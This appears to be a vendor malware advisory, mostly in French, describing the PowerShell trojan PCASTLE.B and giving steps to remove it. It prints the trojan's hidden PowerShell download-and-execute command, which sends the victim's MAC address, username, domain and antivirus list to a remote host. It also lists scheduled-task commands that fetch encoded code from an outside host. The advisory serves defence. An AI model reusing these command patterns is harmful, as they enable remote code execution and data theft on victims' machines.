Analysé par: Arvin Roi Macaraeg   
 Modifié par: : Patrick Angelo Roderno

 

TrojanDownloader:PowerShell/Credcalper (MICROSOFT); HEUR:Trojan.PowerShell.Generic (KASPERSKY); Mal/PSDL-J (SOPHOS)

 Plate-forme:

Windows

 Évaluation globale des risques:
 Dommages potentiels:
 Distribution potentielle:
 Reported Infection:
 Information Exposure Rating:
Faible
Medium
Élevé
Critique

  • Type de grayware:
    Trojan

  • Destructif:
    Non

  • Chiffrement:
    Non

  • In the wild:
    Oui

  Overview

Voie d'infection: Téléchargé à partir d'Internet


  Détails techniques

File size: 3,122,543 bytes
Memory resident: Non
Date de réception des premiers échantillons: 12 mars 2019
Charge malveillante: Connects to URLs/IPs, Steals information

Installation

Introduit les fichiers suivants :

  • %AppDataLocal%\kkk1.log
  • %AppDataLocal%\pp2.log
  • %AppDataLocal%\333.log
  • %AppDataLocal%\kk4.log
  • %AppDataLocal%\kk5.log

Ajoute les processus suivants :

  • powershell Start-Process -FilePath cmd.exe -ArgumentList "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.{BLOCKED}h.com/newol.dat?allv5" +
    "&mac={MAC Address}&av={List of AV Products}&version={OS Version}&bit={OS Architecture}&flag2=
    False&domain={Domain Name}&user={Username}&PS={If Powershell-Enabled}" + "')" + '""

Ajoute les algorithmes Mutex suivants afin d''éviter que plusieurs de ses duplicats ne s''exécutent simultanément :

  • Global\powerv5

Vol d'informations

Collecte les données suivantes :

  • OS Version
  • MAC Address
  • List of AV products from the victim's machine
  • OS Architecture
  • Username
  • Domain Name

  Solutions

Moteur de scan minimum: 9.850
First VSAPI Pattern File: 14.920.05
First VSAPI Pattern Release Date: 05 avril 2019
VSAPI OPR Pattern Version: 14.921.00
VSAPI OPR Pattern Release Date: 06 avril 2019

Step 1

En cas d"utilisation de Windows ME ou XP, avant de procéder à un scan, assurez-vous de désactiver l’option de restauration du système afin que l’opération de scan soit complète sur votre ordinateur.

Step 2

Note that not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.

Step 3

Identifier et mettre fin à des fichiers détectés comme étant Trojan.PS1.PCASTLE.B

[ learnMore ]
  1. Sous Windows 98 ou ME, il se peut que le gestionnaire de tâches Windows n"affiche pas tous les processus en cours. Dans ce cas, veuillez utiliser le gestionnaire de tâches d"une application tierce, si possible Process Explorer, pour mettre fin au processus du programme malveillant/grayware/programme espion. Vous pouvez télécharger l"outil en question ici.
  2. Si le fichier détecté est affiché dans le gestionnaire de tâches Windows ou dans Process Explorer, mais que vous ne pouvez pas le supprimer, redémarrez l"ordinateur en mode sans échec. Consultez ce lien pour obtenir le détail des étapes à suivre.
  3. Si le fichier détecté n"est pas affiché dans le gestionnaire de tâches Windows, ni dans Process Explorer, passez aux étapes suivantes.

Step 4

Deleting Scheduled Tasks

The following {Task Name} - {Task to be run} listed should be used in the steps identified below:

  • \Microsoft\windows\{MAC Address} - powershell -nop -ep bypass -e [malicious code from http://v.y6h.net/g?h{date of infection in the format 'yyMMdd'}]
  • {MAC Address} - powershell -nop -ep bypass -e [malicious code from http://v.y6h.net/g?l{date of infection in the format 'yyMMdd'}]
  • Credentials - powershell -nop -w hidden -ep bypass -f %Application Data%\Microsoft\cred.ps1
  • \Microsoft\Windows\{random 4-8 characters} - %AppDataLocal%\{random 4-8 characters}.exe
  • {random 4-8 characters} - %AppDataLocal%\run.vbs
  • \Microsoft\windows\Bluetooths - powershell -nop -ep bypass -e {base64-encoded command}

For Windows 2000, Windows XP, and Windows Server 2003:

  1. Open the Windows Scheduled Tasks. Click Start>Programs>Accessories>
    System Tools>Scheduled Tasks.
  2. Locate each {Task Name} values listed above in the Name column.
  3. Right-click on the said file(s) with the aforementioned value.
  4. Click on Properties. In the Run field, check for the listed {Task to be run}.
  5. If the strings match the list above, delete the task.

For Windows Vista, Windows 7, Windows Server 2008, Windows 8, Windows 8.1, and Windows Server 2012:

  1. Open the Windows Task Scheduler. To do this:
    • On Windows Vista, Windows 7, and Windows Server 2008, click Start, type taskschd.msc in the Search input field, then press Enter.
    • On Windows 8, Windows 8.1, and Windows Server 2012, right-click on the lower left corner of the screen, click Run, type taskschd.msc, then press Enter.
  2. In the left panel, click Task Scheduler Library.
  3. In the upper-middle panel, locate each {Task Name} values listed above in the Name column.
  4. In the lower-middle panel, click the Actions tab. In the Details column, check for the {Task to be run} string.
  5. If the said string is found, delete the task.

Step 5

Recherche et suppression de ces fichiers

[ learnMore ]
Il se peut que certains fichiers de composants soient cachés. Assurez-vous que la case Rechercher dans les fichiers et les dossiers cachés est cochée dans les "Options avancées" afin que les fichiers et dossiers cachés soient inclus dans les résultats de la recherche.
  • %AppDataLocal%\kkk1.log
  • %AppDataLocal%\pp2.log
  • %AppDataLocal%\333.log
  • %AppDataLocal%\kk4.log
  • %AppDataLocal%\kk5.log
  • %AppDataLocal%\mn.exe
  • %AppDataLocal%\{random 4-8 characters}.exe
  • %AppDataLocal%\run.vbs
  • %AppDataLocal%\ddd.exe
  • %Application Data%\sign.txt
  • %Application Data%\flashplayer.tmp
  • %Application Data%\Microsoft\cred.ps1
  • %User Startup%\FlashPlayer.lnk
DATA_GENERIC_FILENAME_1
  • Dans la liste déroulante Regarder dans, sélectionnez Poste de travail, puis appuyez sur entrée.
  • Une fois localisé, sélectionnez le fichier et appuyez sur MAJ+SUPPR pour effacer le fichier de manière définitive.
  • Répétez les étapes 2 à 4 pour les fichiers restants :
      • %AppDataLocal%\kkk1.log
      • %AppDataLocal%\pp2.log
      • %AppDataLocal%\333.log
      • %AppDataLocal%\kk4.log
      • %AppDataLocal%\kk5.log
      • %AppDataLocal%\mn.exe
      • %AppDataLocal%\{random 4-8 characters}.exe
      • %AppDataLocal%\run.vbs
      • %AppDataLocal%\ddd.exe
      • %Application Data%\sign.txt
      • %Application Data%\flashplayer.tmp
      • %Application Data%\Microsoft\cred.ps1
      • %User Startup%\FlashPlayer.lnk
  • Step 6

    Effectuez un scan de l’ordinateur à l’aide de votre produit Trend Micro pour supprimer les fichiers spécifiés comme étant Trojan.PS1.PCASTLE.B Si les fichiers détectés ont déjà été nettoyés, supprimés ou placés en quarantaine par votre produit Trend Micro, aucune autre procédure n"est nécessaire. Vous pouvez simplement choisir de supprimer les fichiers en quarantaine. Veuillez consulter cette page de base de connaissances pour plus d"informations.


    Participez à notre enquête!